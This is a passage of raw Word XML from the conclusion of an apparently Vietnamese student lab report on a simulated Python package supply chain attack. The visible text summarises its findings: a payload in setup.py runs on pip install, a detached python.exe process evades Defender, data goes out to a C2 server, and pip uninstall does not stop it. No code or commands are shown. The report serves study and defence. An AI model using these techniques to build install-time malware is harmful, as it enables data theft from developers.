      </w:pPr>
      <w:r w:rsidRPr="009E5BA7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BBEB69D" wp14:editId="0E70A0BF">
            <wp:extent cx="5960110" cy="273050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="97554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47851" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="273050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB24FD5" w14:textId="3B43C994" w:rsidR="004D4D10" w:rsidRDefault="004D4D10" w:rsidP="009211D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6288"/>
        </w:tabs>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D4D10" w14:paraId="5DCBB1AB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="39AD597F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Bài học quan trọng: pip uninstall ≠ dừng malware</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A4F430A" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:t>Gỡ cài đặt package (pip uninstall) CHỈ xóa file khỏi site-packages — không kill tiến trình đang chạy. Tiến trình Python detached hoàn toàn độc lập với package. Đây là lý do EDR tool phải theo dõi process tree, không chỉ file system. Ngoài ra, dù tiến trình đã bị kill, dữ liệu đã bị exfiltrate vẫn nằm trên C2 server của attacker — thiệt hại đã xảy ra không thể hoàn tác.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A6BE18F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F4878B" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="5" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1400D237" w14:textId="43100BF4" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc227470586"/>
      <w:r>
        <w:t>V. KẾT LUẬN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="7E8D3EF9" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB5E31A" w14:textId="082CF259" w:rsidR="004D4D10" w:rsidRDefault="009211D7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc227470587"/>
      <w:r>
        <w:t>5.1 — Những gì nhóm đã chứng minh được</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="5BD60DAC" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Supply chain attack không cần exploit hay kỹ thuật cao — chỉ cần đặt code độc hại vào đúng điểm tin tưởng: package dependency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD76649" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Module-level execution trong setup.py là vector tấn công mạnh: pip chỉ cần chạm vào file để đọc metadata là payload kích hoạt — victim không cần làm gì thêm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7BE074" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Living off the Land (python.exe) bypass signature-based AV hiệu quả — Defender Full Scan 48 phút không phát hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5E8521" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>True exfiltration (T1041) khác với local staging (T1074) — dữ liệu rời khỏi máy victim tự động, attacker không cần thêm thao tác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0726054E" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>pip uninstall không đủ dừng malware — cần kill tiến trình, và exfiltration đã xảy ra là không thể hoàn tác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A62B4B" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Detector có thể phát hiện được IOC qua network monitoring — nhưng cần whitelist đúng để tránh false positive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D7D1A8" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A00E06D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004D4D10">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1400" w:right="1260" w:bottom="14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2ADC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D538560A"/>
    <w:lvl w:ilvl="0" w:tplc="26829890">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="49800088">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A24A9FBC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="571A1B9A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="60923104">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E5569B10">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4E9E5728">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="32DC8828">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E2B6E716">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4C4F3351"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="28522992"/>
    <w:lvl w:ilvl="0" w:tplc="50D09398">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9536A96E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5B36BAB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8938A4E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="96908AA4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="15861E5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DF50B56A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4FDE62C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="916E92F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="51E5177B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E39A503C"/>
    <w:lvl w:ilvl="0" w:tplc="9EFCCACA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1CA41D5E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FD70369E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C060A816">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D8909282">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="EE467178">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A0D0F9D2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7A6E74FA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F7FC0EB2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="2137946202">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1662143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D10"/>
    <w:rsid w:val="00031A18"/>
    <w:rsid w:val="001674E7"/>
    <w:rsid w:val="00246FB1"/>
    <w:rsid w:val="00280D10"/>
    <w:rsid w:val="002D1355"/>
    <w:rsid w:val="00395FF1"/>
    <w:rsid w:val="004D4D10"/>
    <w:rsid w:val="0062333B"/>
    <w:rsid w:val="006A5514"/>
    <w:rsid w:val="007B030B"/>
    <w:rsid w:val="008D3A5B"/>
    <w:rsid w:val="008F741E"/>
    <w:rsid w:val="009211D7"/>
    <w:rsid w:val="00943EF1"/>
    <w:rsid w:val="00A93806"/>
    <w:rsid w:val="00C44D2D"/>
    <w:rsid w:val="00D2523D"/>
    <w:rsid w:val="00D65956"/>
    <w:rsid w:val="00D96844"/>
    <w:rsid w:val="00FF4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E462"/>
  <w15:docId w15:val="{00643A02-BB2D-4FE2-8BFB-35355297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41E"/>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D1355"/>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2D1355"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D135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BEA6C-A961-4BC5-83B1-5AA05F475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28</Pages>
  <Words>5537</Words>
  <Characters>31561</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>263</Lines>
  <Paragraphs>74</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>37024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Hồng Quân 108.Trần</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-17T15:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-18T22:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>